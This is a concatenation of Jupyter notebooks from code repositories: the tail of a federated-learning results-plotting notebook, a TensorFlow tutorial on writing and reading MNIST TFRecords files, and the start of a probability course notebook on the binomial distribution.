clients", "_____no_output_____" ] ], [ [ "agg = pd.concat([v for k, v in agg_df_dict.items()])\nagg = agg.reset_index()\nagg['avg test acc'] = agg['avg test acc'] * 100\nagg['MFLOPs'] = agg['GFLOPs'] * 1e3\nagg['method'] = agg['mode'].apply(lambda n: n if n != 'FedAvg' else 'Ind. FedAvg')\nagg['budgets'] = agg['slim_ratios'].apply(lambda n: (n.replace('d', '/')) if '-' in n else n)\nagg = agg[agg['slim_ratios'].apply(lambda n: 'd' not in n)]\n\nfig, ax = plt.subplots(1, 1, figsize=(5,3))\nsns.lineplot(data=agg, x='width', y='avg test acc', marker='o', style='method', hue='budgets',\n style_order=['Ind. FedAvg', 'SplitMix', 'SHeteroFL'], palette=cmap[:len(agg['budgets'].unique())])\nax.set(xticks=agg['width'].unique(), ylabel='average test accuracy (%)',\n xlabel='width (%)')\n# ax.set(xlim=(None, 200))\nax.legend(loc='center left', bbox_to_anchor=(1, 0.5))\nax.grid(True)\n\nplt.tight_layout()\nout_file = os.path.join(cache_path, f'vary_budget_dist_skew.pdf')\nprint(f\"save fig => {out_file}\")\nplt.savefig(out_file)\n\nplt.show()", "_____no_output_____" ], [ "fig, ax = plt.subplots(1, 1, figsize=(4,3))\ndf = agg[np.isin(agg['budgets'], ['8-4-2-1', 'w/o constraint'])]\n# df = df[np.isin(df['method'], ['Ind. FedAvg', 'SHeteroFL'])]\nsns.lineplot(data=df, x='width', y='avg test acc', marker='o', style='method', # hue='budgets',\n# style_order=['Ind. FedAvg', 'SplitMix', 'SHeteroFL'], # palette=cmap[:len(df['budgets'].unique())]\n )\nax.set(xticks=df['width'].unique(), ylabel='average test accuracy (%)', xlabel='width (%)')\nax.set(ylim=(81, 90.2))\n# ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))\n# ax.legend('')\nax.grid(True)", "_____no_output_____" ], [ "df_dict = defaultdict(list)\nfor slim_ratio in agg['slim_ratios']:\n if slim_ratio != 'w/o constraint':\n slim_ratios = get_slimmabe_ratios(slim_ratio)\n df_dict['group'].extend([1,2,3,4])\n df_dict['width constraint'].extend(slim_ratios)\n df_dict['budgets'].extend([slim_ratio]*len(slim_ratios))\ndf = pd.DataFrame(df_dict)\n# df\n\nfig, ax = plt.subplots(1, 1, figsize=(5,3))\nsns.barplot(data=df, x='group', y='width constraint', hue='budgets', \n palette=cmap[1:len(agg['budgets'].unique())])\nplt.grid(True)\n\nplt.tight_layout()\nout_file = os.path.join(cache_path, f'budget_dist_skew.pdf')\nprint(f\"save fig => {out_file}\")\nplt.savefig(out_file)\n\nplt.show()", "_____no_output_____" ], [ "df_ = df[df['budgets'] == '8-4-2-1']\nfig, ax = plt.subplots(1, 1, figsize=(5,3))\nsns.barplot(data=df_, x='group', y='width constraint', hue='budgets')\nplt.grid(True)", "_____no_output_____" ] ], [ [ "step-increase budgets", "_____no_output_____" ] ], [ [ "agg = pd.concat([v for k, v in agg_df_dict.items()])\nagg = agg.reset_index()\nagg['avg test acc'] = agg['avg test acc'] * 100\nagg['MFLOPs'] = agg['GFLOPs'] * 1e3\nagg['method'] = agg['mode'].apply(lambda n: n if n != 'FedAvg' else 'Ind. FedAvg')\nagg['budgets'] = agg['slim_ratios'].apply(lambda n: (n.replace('d', '/')) if '-' in n else n)\nagg = agg[agg['budgets'].apply(lambda n: '/' in n)]\n\nfig, ax = plt.subplots(1, 1, figsize=(5,3))\nsns.lineplot(data=agg, x='width', y='avg test acc', marker='o', style='method', hue='budgets',\n style_order=['Ind. FedAvg', 'SplitMix', 'SHeteroFL'])\nax.set(xticks=agg['width'].unique(), ylabel='average test accuracy (%)', ylim=(77.5, None))\nax.set(xlabel='width (%)')\nax.legend(loc='center left', bbox_to_anchor=(1, 0.5))\nax.grid(True)\n\nplt.tight_layout()\nout_file = os.path.join(cache_path, f'vary_budget_dist_step.pdf')\nprint(f\"save fig => {out_file}\")\nplt.savefig(out_file)\n\nplt.show()", "_____no_output_____" ], [ "df_dict = defaultdict(list)\nfor slim_ratio in agg['slim_ratios']:\n if slim_ratio != 'w/o constraint':\n slim_ratios = get_slimmabe_ratios(slim_ratio)\n df_dict['group'].extend([1,2,3,4])\n df_dict['width constraint'].extend(slim_ratios)\n df_dict['budgets'].extend([slim_ratio]*len(slim_ratios))\ndf = pd.DataFrame(df_dict)\n# df\n\nfig, ax = plt.subplots(1, 1, figsize=(5,3))\nsns.barplot(data=df, x='group', y='width constraint', hue='budgets')\nplt.grid(True)\n\nplt.tight_layout()\nout_file = os.path.join(cache_path, f'budget_dist_step.pdf')\nprint(f\"save fig => {out_file}\")\nplt.savefig(out_file)\n\nplt.show()", "_____no_output_____" ] ], [ [ "log normal budget distribution", "_____no_output_____" ] ], [ [ "ln_agg_df_dict = {}\nfor mode in ['SplitMix ln', 'HeteroFL ln']:\n # 'SplitMix step=0.25 non-exp'\n api = wandb.Api()\n sweep = api.sweep(sweep_dict[mode])\n\n print(f\"mode: {mode}\")\n api = wandb.Api()\n sweep = api.sweep(sweep_dict[mode])\n\n df_dict = fetch_config_summary(\n sweep.runs,\n config_keys = ['test_slim_ratio', 'slim_ratios'], \n summary_keys = ['avg test acc', 'GFLOPs', 'model size (MB)']\n )\n df = pd.DataFrame(df_dict)\n df['mode'] = mode.split(' ')[0]\n df['test_slim_ratio'] = df['test_slim_ratio'] * 100\n df['width'] = df['test_slim_ratio']\n df = df[df['slim_ratios'] != '8-4-2-1']\n ln_agg_df_dict[mode] = df\nln_agg_df_dict['FedAvg'] = agg_df_dict['FedAvg']", "_____no_output_____" ], [ "agg = pd.concat([v for k, v in ln_agg_df_dict.items()])\nagg = agg.reset_index()\nagg['avg test acc'] = agg['avg test acc'] * 100\nagg['method'] = agg['mode'].apply(lambda n: n if n != 'FedAvg' else 'Ind. FedAvg')\n\nfig, ax = plt.subplots(1, 1, figsize=(4,3))\nsns.lineplot(data=agg, x='width', y='avg test acc', marker='o', style='method', #hue='budgets',\n style_order=['Ind. FedAvg', 'SplitMix', 'HeteroFL'])\nax.set(xticks=agg['width'].unique(), ylabel='average test accuracy (%)', ylim=(65, None),\n xlabel='width (%)')\nax.grid(True)\n\nplt.tight_layout()\nout_file = os.path.join(cache_path, f'vary_budget_dist_ln.pdf')\nprint(f\"save fig => {out_file}\")\nplt.savefig(out_file)\n\nplt.show()", "_____no_output_____" ], [ "def get_slim_ratio_schedule(train_slim_ratios: list, mode: str, client_num):\n if mode.startswith('ln'): # lognorm\n ws = sorted(train_slim_ratios)\n min_w = min(train_slim_ratios)\n from scipy.stats import lognorm\n s, scale = [float(v) for v in mode[len('ln'):].split('_')]\n rv = lognorm(s=s, scale=scale)\n print(ws)\n cdfs = [rv.cdf(w) for w in ws] + [1.]\n print(cdfs)\n qs = [c - rv.cdf(min_w) for c in cdfs]\n r = (qs[-1]-qs[0])\n qs = [int(client_num * (q-qs[0]) / r) for q in qs]\n print(qs)\n slim_ratios = np.zeros(client_num)\n for i in range(len(qs)-1):\n slim_ratios[qs[i]:qs[i+1]] = ws[i]\n return slim_ratios\nget_slim_ratio_schedule(np.arange(0.125, 1.+0.125, 0.125), 'ln0.5_0.4', 50)", "_____no_output_____" ], [ "sch = get_slim_ratio_schedule(np.arange(0.125, 1.+0.125, 0.125), 'ln0.5_0.4', 50)\nbudgets, cnts = np.unique(sch, return_counts=True)\nprint(budgets, cnts)\n\nfig, ax = plt.subplots(1, 1, figsize=(4,3))\nax.bar(x=budgets, height=cnts, width=[0.125]*len(budgets), align='center')\n\nax.grid(True)\nax.set(xlabel='budget (maximal compatible width)', ylabel='number of clients')\nax.set_xticks(budgets)\nax.set_xticklabels(budgets)\n\nplt.tight_layout()\nout_file = os.path.join(cache_path, f'digits_budget_dist_ln0.5_0.4.pdf')\nprint(f\"save fig => {out_file}\")\nplt.savefig(out_file)\n\nplt.show()", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ] ]
e72d4b660cd2d89ed123d41cbaa769b747a90818
39,550
ipynb
Jupyter Notebook
code/model_zoo/tensorflow_ipynb/tfrecords.ipynb
wpsliu123/Sebastian_Raschka-Deep-Learning-Book
fc57a58b46921f057248bd8fd0f258e952a3cddb
[ "MIT" ]
3
2019-02-19T16:42:28.000Z
2020-10-11T05:16:12.000Z
code/model_zoo/tensorflow_ipynb/tfrecords.ipynb
bharat3012/deep-learning-book
839e076c5098084512c947a38878a9a545d9a87d
[ "MIT" ]
null
null
null
code/model_zoo/tensorflow_ipynb/tfrecords.ipynb
bharat3012/deep-learning-book
839e076c5098084512c947a38878a9a545d9a87d
[ "MIT" ]
2
2020-09-07T12:43:33.000Z
2021-06-11T12:10:09.000Z
54.854369
6,822
0.685917
[ [ [ "*Accompanying code examples of the book \"Introduction to Artificial Neural Networks and Deep Learning: A Practical Guide with Applications in Python\" by [Sebastian Raschka](https://sebastianraschka.com). All code examples are released under the [MIT license](https://github.com/rasbt/deep-learning-book/blob/master/LICENSE). If you find this content useful, please consider supporting the work by buying a [copy of the book](https://leanpub.com/ann-and-deeplearning).*\n \nOther code examples and content are available on [GitHub](https://github.com/rasbt/deep-learning-book). The PDF and ebook versions of the book are available through [Leanpub](https://leanpub.com/ann-and-deeplearning).", "_____no_output_____" ] ], [ [ "%load_ext watermark\n%watermark -a 'Sebastian Raschka' -v -p tensorflow,numpy", "Sebastian Raschka \n\nCPython 3.6.1\nIPython 6.1.0\n\ntensorflow 1.1.0\nnumpy 1.12.1\n" ] ], [ [ "# Using Input Pipelines to Read Data from TFRecords Files", "_____no_output_____" ], [ "TensorFlow provides users with multiple options for providing data to the model. One of the probably most common methods is to define placeholders in the TensorFlow graph and feed the data from the current Python session into the TensorFlow `Session` using the `feed_dict` parameter. Using this approach, a large dataset that does not fit into memory is most conveniently and efficiently stored using NumPy archives as explained in [Chunking an Image Dataset for Minibatch Training using NumPy NPZ Archives](image-data-chunking-npz.ipynb) or HDF5 data base files ([Storing an Image Dataset for Minibatch Training using HDF5](image-data-chunking-hdf5.ipynb)).\n\nAnother approach, which is often preferred when it comes to computational efficiency, is to do the \"data loading\" directly in the graph using input queues from so-called TFRecords files, which will be illustrated in this notebook.\n\nBeyond the examples in this notebook, you are encouraged to read more in TensorFlow's \"[Reading Data](https://www.tensorflow.org/programmers_guide/reading_data)\" guide.", "_____no_output_____" ], [ "## 0. The Dataset", "_____no_output_____" ], [ "Let's pretend we have a directory of images containing two subdirectories with images for training, validation, and testing. The following function will create such a dataset of images in JPEG format locally for demonstration purposes.", "_____no_output_____" ] ], [ [ "# Note that executing the following code \n# cell will download the MNIST dataset\n# and save all the 60,000 images as separate JPEG\n# files. This might take a few minutes depending\n# on your machine.\n\nimport numpy as np\nfrom helper import mnist_export_to_jpg\n\nnp.random.seed(123)\nmnist_export_to_jpg(path='./')", "Extracting ./train-images-idx3-ubyte.gz\nExtracting ./train-labels-idx1-ubyte.gz\nExtracting ./t10k-images-idx3-ubyte.gz\nExtracting ./t10k-labels-idx1-ubyte.gz\n" ] ], [ [ "The `mnist_export_to_jpg` function called above creates 3 directories, mnist_train, mnist_test, and mnist_validation. Note that the names of the subdirectories correspond directly to the class label of the images that are stored under it:", "_____no_output_____" ] ], [ [ "import os\n\nfor i in ('train', 'valid', 'test'): \n dirs = [d for d in os.listdir('mnist_%s' % i) if not d.startswith('.')]\n print('mnist_%s subdirectories' % i, dirs)", "mnist_train subdirectories ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\nmnist_valid subdirectories ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\nmnist_test subdirectories ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n" ] ], [ [ "To make sure that the images look okay, the snippet below plots an example image from the subdirectory `mnist_train/9/`:", "_____no_output_____" ] ], [ [ "%matplotlib inline\nimport matplotlib.image as mpimg\nimport matplotlib.pyplot as plt\nimport os\n\nsome_img = os.path.join('./mnist_train/9/', os.listdir('./mnist_train/9/')[0])\n\nimg = mpimg.imread(some_img)\nprint(img.shape)\nplt.imshow(img, cmap='binary');", "(28, 28)\n" ] ], [ [ "Note: The JPEG format introduces a few artifacts that we can see in the image above. In this case, we use JPEG instead of PNG. Here, JPEG is used for demonstration purposes since that's still format many image datasets are stored in.", "_____no_output_____" ], [ "## 1. Saving images as TFRecords files", "_____no_output_____" ], [ "First, we are going to convert the images into a binary TFRecords file, which is based on Google's [protocol buffer](https://developers.google.com/protocol-buffers/) format:\n\n> The recommended format for TensorFlow is a TFRecords file containing tf.train.Example protocol buffers (which contain Features as a field). You write a little program that gets your data, stuffs it in an Example protocol buffer, serializes the protocol buffer to a string, and then writes the string to a TFRecords file using the tf.python_io.TFRecordWriter. For example, tensorflow/examples/how_tos/reading_data/convert_to_records.py converts MNIST data to this format. \n\n> [ Excerpt from https://www.tensorflow.org/programmers_guide/reading_data ]\n\n", "_____no_output_____" ] ], [ [ "import glob\nimport numpy as np\nimport tensorflow as tf\n\n\ndef images_to_tfrecords(data_stempath='./mnist_',\n shuffle=False, \n random_seed=None):\n \n def int64_to_feature(value):\n return tf.train.Feature(int64_list=tf.train.Int64List(value=value))\n \n for s in ['train', 'valid', 'test']:\n\n with tf.python_io.TFRecordWriter('mnist_%s.tfrecords' % s) as writer:\n\n img_paths = np.array([p for p in glob.iglob('%s%s/**/*.jpg' % \n (data_stempath, s), \n recursive=True)])\n\n if shuffle:\n rng = np.random.RandomState(random_seed)\n rng.shuffle(img_paths)\n\n for idx, path in enumerate(img_paths):\n label = int(os.path.basename(os.path.dirname(path)))\n image = mpimg.imread(path)\n image = image.reshape(-1).tolist()\n\n\n example = tf.train.Example(features=tf.train.Features(feature={\n 'image': int64_to_feature(image),\n 'label': int64_to_feature([label])}))\n\n writer.write(example.SerializeToString())", "_____no_output_____" ] ], [ [ "Note that it is important to shuffle the dataset so that we can later make use of TensorFlow's [`tf.train.shuffle_batch`](https://www.tensorflow.org/api_docs/python/tf/train/shuffle_batch) function and don't need to load the whole dataset into memory to shuffle epochs.", "_____no_output_____" ] ], [ [ "images_to_tfrecords(shuffle=True, random_seed=123)", "_____no_output_____" ] ], [ [ "Just to make sure that the images were serialized correctly, let us load an image back from TFRecords using the [`tf.python_io.tf_record_iterator`](https://www.tensorflow.org/api_docs/python/tf/python_io/tf_record_iterator) and display it:", "_____no_output_____" ] ], [ [ "import tensorflow as tf\nimport numpy as np\n\n\nrecord_iterator = tf.python_io.tf_record_iterator(path='mnist_train.tfrecords')\n\nfor r in record_iterator:\n example = tf.train.Example()\n example.ParseFromString(r)\n \n label = example.features.feature['label'].int64_list.value[0]\n print('Label:', label)\n img = np.array(example.features.feature['image'].int64_list.value)\n img = img.reshape((28, 28))\n plt.imshow(img, cmap='binary')\n plt.show\n break", "Label: 2\n" ] ], [ [ "So far so good, the image above looks okay. In the next secction, we will introduce a slightly different approach for loading the images, namely, the [`TFRecordReader`](https://www.tensorflow.org/api_docs/python/tf/TFRecordReader), which we need to load images inside a TensorFlow graph.", "_____no_output_____" ], [ "## 2. Loading images via the TFRecordReader", "_____no_output_____" ], [ "Roughly speaking, we can regard the [`TFRecordReader`](https://www.tensorflow.org/api_docs/python/tf/TFRecordReader) as a class that let's us load images \"symbolically\" inside a TensorFlow graph. A `TFRecordReader` uses the state in the graph to remember the location of a `.tfrecord` file that it reads and lets us iterate over training examples and batches after initializing the graph as we will see later.\n\nTo see how it works, let's start with a simple function that reads one image at a time:", "_____no_output_____" ] ], [ [ "def read_one_image(tfrecords_queue, normalize=True):\n\n reader = tf.TFRecordReader()\n key, value = reader.read(tfrecords_queue)\n features = tf.parse_single_example(value,\n features={'label': tf.FixedLenFeature([], tf.int64),\n 'image': tf.FixedLenFeature([784], tf.int64)})\n label = tf.cast(features['label'], tf.int32)\n image = tf.cast(features['image'], tf.float32)\n onehot_label = tf.one_hot(indices=label, depth=10)\n \n if normalize:\n # normalize to [0, 1] range\n image = image / 255.\n \n return onehot_label, image", "_____no_output_____" ] ], [ [ "To use this `read_one_image` function to fetch images in a TensorFlow session, we will make use of queue runners as illustrated in the following example:", "_____no_output_____" ] ], [ [ "g = tf.Graph()\nwith g.as_default():\n \n queue = tf.train.string_input_producer(['mnist_train.tfrecords'], \n num_epochs=10)\n label, image = read_one_image(queue)\n\n\nwith tf.Session(graph=g) as sess:\n sess.run(tf.local_variables_initializer())\n sess.run(tf.global_variables_initializer())\n \n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n \n for i in range(10):\n one_label, one_image = sess.run([label, image])\n \n print('Label:', one_label, '\\nImage dimensions:', one_image.shape)\n \n coord.request_stop()\n coord.join(threads)", "Label: [ 0. 0. 0. 0. 0. 0. 0. 1. 0. 0.] \nImage dimensions: (784,)\n" ] ], [ [ "- The `tf.train.string_input_producer` produces a filename queue that we iterate over in the session. Note that we need to call `sess.run(tf.local_variables_initializer())` if we define a fixed number of `num_epochs` in `tf.train.string_input_producer`. Alternatively, `num_epochs` can be set to `None` to iterate \"infinitely.\" \n\n- The `tf.train.start_queue_runners` function uses a queue runner that uses a separate thread to load the filenames from the `queue` that we defined in the graph without blocking the reader.", "_____no_output_____" ], [ "However, we rarely (want to) train neural networks with one datapoint at a time but use minibatches instead. TensorFlow also has some really convenient utility functions to do the batching conveniently. In the following code example, we will use the [`tf.train.shuffle_batch`](https://www.tensorflow.org/api_docs/python/tf/train/shuffle_batch) function to load the images and labels in batches of size 64:", "_____no_output_____" ] ], [ [ "g = tf.Graph()\nwith g.as_default():\n \n queue = tf.train.string_input_producer(['mnist_train.tfrecords'], \n num_epochs=10)\n label, image = read_one_image(queue)\n \n \n label_batch, image_batch = tf.train.shuffle_batch([label, image], \n batch_size=64,\n capacity=5000,\n min_after_dequeue=2000,\n num_threads=8,\n seed=123)\n\nwith tf.Session(graph=g) as sess:\n sess.run(tf.local_variables_initializer())\n sess.run(tf.global_variables_initializer())\n \n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n \n for i in range(10):\n many_labels, many_images = sess.run([label_batch, image_batch])\n \n print('Batch size:', many_labels.shape[0])\n \n coord.request_stop()\n coord.join(threads)", "Batch size: 64\n" ] ], [ [ "The other relevant arguments we provided to `tf.train.shuffle_batch` are described below:\n\n- `capacity`: An integer that defines the maximum number of elements in the queue.\n- `min_after_dequeue`: The minimum number elements in the queue after a dequeue, which is used to ensure that a minimum number of data points have been loaded for shuffling.\n- `num_threads`: The number of threads for enqueuing.\n", "_____no_output_____" ], [ "## 3. Use queue runners to train a neural network", "_____no_output_____" ], [ "In this section, we will take the concepts that were introduced in the previous sections and train a multilayer perceptron from the `'mnist_train.tfrecords'` file:\n ", "_____no_output_____" ] ], [ [ "##########################\n### SETTINGS\n##########################\n\n# Hyperparameters\nlearning_rate = 0.1\nbatch_size = 128\nn_epochs = 15\nn_iter = n_epochs * (45000 // batch_size)\n\n# Architecture\nn_hidden_1 = 128\nn_hidden_2 = 256\nheight, width = 28, 28\nn_classes = 10\n\n\n\n##########################\n### GRAPH DEFINITION\n##########################\n\ng = tf.Graph()\nwith g.as_default():\n \n tf.set_random_seed(123)\n\n # Input data\n queue = tf.train.string_input_producer(['mnist_train.tfrecords'], \n num_epochs=None)\n label, image = read_one_image(queue)\n \n label_batch, image_batch = tf.train.shuffle_batch([label, image], \n batch_size=batch_size,\n seed=123,\n num_threads=8,\n capacity=5000,\n min_after_dequeue=2000)\n \n tf_images = tf.placeholder_with_default(image_batch,\n shape=[None, 784], \n name='images')\n tf_labels = tf.placeholder_with_default(label_batch, \n shape=[None, 10], \n name='labels')\n\n # Model parameters\n weights = {\n 'h1': tf.Variable(tf.truncated_normal([height*width, n_hidden_1], stddev=0.1)),\n 'h2': tf.Variable(tf.truncated_normal([n_hidden_1, n_hidden_2], stddev=0.1)),\n 'out': tf.Variable(tf.truncated_normal([n_hidden_2, n_classes], stddev=0.1))\n }\n biases = {\n 'b1': tf.Variable(tf.zeros([n_hidden_1])),\n 'b2': tf.Variable(tf.zeros([n_hidden_2])),\n 'out': tf.Variable(tf.zeros([n_classes]))\n }\n\n # Multilayer perceptron\n layer_1 = tf.add(tf.matmul(tf_images, weights['h1']), biases['b1'])\n layer_1 = tf.nn.relu(layer_1)\n layer_2 = tf.add(tf.matmul(layer_1, weights['h2']), biases['b2'])\n layer_2 = tf.nn.relu(layer_2)\n out_layer = tf.matmul(layer_2, weights['out']) + biases['out']\n\n # Loss and optimizer\n loss = tf.nn.softmax_cross_entropy_with_logits(logits=out_layer, labels=tf_labels)\n cost = tf.reduce_mean(loss, name='cost')\n optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)\n train = optimizer.minimize(cost, name='train')\n\n # Prediction\n prediction = tf.argmax(out_layer, 1, name='prediction')\n correct_prediction = tf.equal(tf.argmax(label_batch, 1), tf.argmax(out_layer, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32), name='accuracy')\n \n \n \nwith tf.Session(graph=g) as sess:\n sess.run(tf.global_variables_initializer())\n saver0 = tf.train.Saver()\n \n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n \n avg_cost = 0.\n iter_per_epoch = n_iter // n_epochs\n epoch = 0\n\n for i in range(n_iter):\n _, cost = sess.run(['train', 'cost:0'])\n avg_cost += cost\n \n if not i % iter_per_epoch:\n epoch += 1\n avg_cost /= iter_per_epoch\n print(\"Epoch: %03d | AvgCost: %.3f\" % (epoch, avg_cost))\n avg_cost = 0.\n \n \n coord.request_stop()\n coord.join(threads)\n \n saver0.save(sess, save_path='./mlp')", "Epoch: 001 | AvgCost: 0.007\nEpoch: 002 | AvgCost: 0.469\nEpoch: 003 | AvgCost: 0.240\nEpoch: 004 | AvgCost: 0.183\nEpoch: 005 | AvgCost: 0.151\nEpoch: 006 | AvgCost: 0.128\nEpoch: 007 | AvgCost: 0.110\nEpoch: 008 | AvgCost: 0.099\nEpoch: 009 | AvgCost: 0.087\nEpoch: 010 | AvgCost: 0.078\nEpoch: 011 | AvgCost: 0.070\nEpoch: 012 | AvgCost: 0.063\nEpoch: 013 | AvgCost: 0.058\nEpoch: 014 | AvgCost: 0.051\nEpoch: 015 | AvgCost: 0.047\n" ] ], [ [ "After looking at the graph above, you probably wondered why we used [`tf.placeholder_with_default`](https://www.tensorflow.org/api_docs/python/tf/placeholder_with_default) to define the two placeholders:\n\n```python\ntf_images = tf.placeholder_with_default(image_batch,\n shape=[None, 784], \n name='images')\ntf_labels = tf.placeholder_with_default(label_batch, \n shape=[None, 10], \n name='labels')\n``` \n\nIn the training session above, these placeholders are being ignored if we don't feed them via a session's `feed_dict`, or in other words \"[A `tf.placeholder_with_default` is a] placeholder op that passes through input when its output is not fed\" (https://www.tensorflow.org/api_docs/python/tf/placeholder_with_default).\n\nHowever, these placeholders are useful if we want to feed new data to the graph and make predictions after training as in a real-world application, which we will see in the next section.", "_____no_output_____" ], [ "## 4. Feeding new datapoints through placeholders", "_____no_output_____" ], [ "To demonstrate how we can feed new data points to the network that are not part of the `mnist_train.tfrecords` file, let's use the test dataset and load the images into Python and pass it to the graph using a `feed_dict`:", "_____no_output_____" ] ], [ [ "record_iterator = tf.python_io.tf_record_iterator(path='mnist_test.tfrecords')\n\nwith tf.Session() as sess:\n \n saver1 = tf.train.import_meta_graph('./mlp.meta')\n saver1.restore(sess, save_path='./mlp')\n \n num_correct = 0\n for idx, r in enumerate(record_iterator):\n example = tf.train.Example()\n example.ParseFromString(r)\n label = example.features.feature['label'].int64_list.value[0]\n image = np.array(example.features.feature['image'].int64_list.value)\n \n pred = sess.run('prediction:0', \n feed_dict={'images:0': image.reshape(1, 784)})\n\n num_correct += int(label == pred[0])\n acc = num_correct / (idx + 1) * 100\n\nprint('Test accuracy: %.1f%%' % acc)", "INFO:tensorflow:Restoring parameters from ./mlp\nTest accuracy: 97.3%\n" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ] ]
e72d567c7bd53da5e428eefec46b37d66561f05d
57,255
ipynb
Jupyter Notebook
notebooks/Chapter_06/01_Binomial_Distribution.ipynb
choldgraf/prob140
0750fc62fb114220035278ed2161e4b82ddca15f
[ "MIT" ]
null
null
null
notebooks/Chapter_06/01_Binomial_Distribution.ipynb
choldgraf/prob140
0750fc62fb114220035278ed2161e4b82ddca15f
[ "MIT" ]
null
null
null
notebooks/Chapter_06/01_Binomial_Distribution.ipynb
choldgraf/prob140
0750fc62fb114220035278ed2161e4b82ddca15f
[ "MIT" ]
null
null
null
129.829932
10,882
0.861252
[ [ [ "# HIDDEN\nfrom datascience import *\nfrom prob140 import *\nimport numpy as np\nimport matplotlib.pyplot as plt\nplt.style.use('fivethirtyeight')\n%matplotlib inline\nimport math\nfrom scipy import stats", "_____no_output_____" ] ], [ [ "## The Binomial Distribution ##", "_____no_output_____" ], [ "Let $X_1, X_2, \\ldots , X_n$ be i.i.d. Bernoulli $(p)$ random variables and let $S_n = X_1 + X_2 \\ldots + X_n$. That's a formal way of saying:\n- Suppose you have a fixed number $n$ of success/failure trials; and\n- the trials are independent; and\n- on each trial, the probability of success is $p$.\n- Let $S_n$ be the total number of successes.\n\nThe first goal of this section is to find the distribution of $S_n$. \n\nIn the example that we fixed our minds on earlier, we are counting the number of sixes in 7 rolls of a die. The 7 rolls are independent of each other, the chance of \"success\" (getting a six) is $1/6$ on each trial, and $S_7$ is the number of sixes.\n\nThe first step in finding the distribution of any random variable is to identify the possible values of the variable. In $n$ trials, the smallest number of successes you can have is 0 and the largest is $n$. So the set of possible values of $S_n$ is $\\{0, 1, 2, \\ldots , n\\}$.\n\nThus the number of sixes in 7 rolls can be any integer in the 0 through 7 range. Let's find $P(S_7 = 3)$.\n\nPartition the event $\\{S_7 = 3\\}$ into the different ways it can happen. One way can be denoted SSSFFFF, where S denotes \"success\" (or \"six\"), and F denotes failure. Another is SFFSSFF. And so on.\n\nNow notice that \n\n$$\nP(\\text{SSSFFFF}) = \n\\big{(}\\frac{1}{6}\\big{)}^3 \\big{(}\\frac{5}{6}\\big{)}^4\n= P(\\text{SFFSSFF})\n$$\nby independence. Indeed, any sequence of three S's and four F's has the same probability. So by the addition rule,\n\n\\begin{align*}\nP(S_7 = 3) &= \\text{(number of sequences that have three S and four F)} \\cdot \\big{(}\\frac{1}{6}\\big{)}^3 \\big{(}\\frac{5}{6}\\big{)}^4 \\\\ \\\\\n&= \\binom{7}{3} \\big{(}\\frac{1}{6}\\big{)}^3 \\big{(}\\frac{5}{6}\\big{)}^4\n\\end{align*}\n\nbecause $\\binom{7}{3}$ counts the number of ways you can choose 3 places out of 7 in which to put the symbol S, with the remaining 4 places being filled with F.\n\nAn analogous argument leads us to one of the most important distributions in probability theory.", "_____no_output_____" ], [ "### The Binomial $(n, p)$ Distribution ###\nLet $S_n$ be the number of successes in $n$ independent Bernoulli $(p)$ trials. Then $S_n$ has the *binomial distribution with parameters $n$ and $p$*, defined by\n\n$$\nP(S_n = k) = \\binom{n}{k} p^k (1-p)^{n-k}, ~~~ k = 0, 1, \\ldots, n\n$$\n\nParameters of a distribution are constants associated with it. The Bernoulli $(p)$ distribution has parameter $p$. The binomial distribution defined above has parameters $n$ and $p$ and is referred to as the binomial $(n, p)$ distribution for short. You should check that the Bernoulli $(p)$ distribution is the same as the binomial $(1, p)$ distribution.\n\nBefore we get going on calculations with the binomial distribution, let's make a few observations.\n\n- The functional form of the probabilities is symmetric in successes and failures, because\n\n$$\nP(S_n = k) = \\frac{n!}{k!(n-k)!} p^k (1-p)^{n-k}, ~~~ k = 0, 1, \\ldots, n\n$$\n\nThat's \"number of trials factorial; divided by number of successes factorial times number of failures factorial; times the probability of success to the power number of successes; times the probability of failure to the power number of failures.\"\n\n- The formula makes sense for the edge cases $k=0$ and $k=n$. We can calculate $P(S_n = 0)$ without any of the machinery developed above. It's the chance of no successes, which is the chance of all failures, which is $(1-p)^n$. Our formula says\n$$\nP(S_n = 0) = \\frac{n!}{0!(n-0)!} p^0 (1-p)^{n-0} = (1-p)^n\n$$\nafter all the dust clears in the formula; the first two factors are both 1. You can check that $P(S_n = n) = p^n$, the\nchance that all the trials are successes.\n\nRemember that $0! = 1$ by definition. In part, it is defined that way to make the formula for $\\binom{n}{k}$ work out correctly when $k=0$. \n\n- The probabilities in the distribution sum to 1. To see this, recall that for any two numbers $a$ and $b$,\n\n\\begin{align*}\n(a+b)^2 &= a^2 + 2ab + b^2 \\\\\n(a+b)^3 &= a^3 + 3a^2b + 3ab^2 + b^3 \\\\\n\\ldots \\\\\n(a+b)^n &= \\sum_{k=0}^n \\binom{n}{k} a^k b^{n-k}\n\\end{align*}\n\nby the 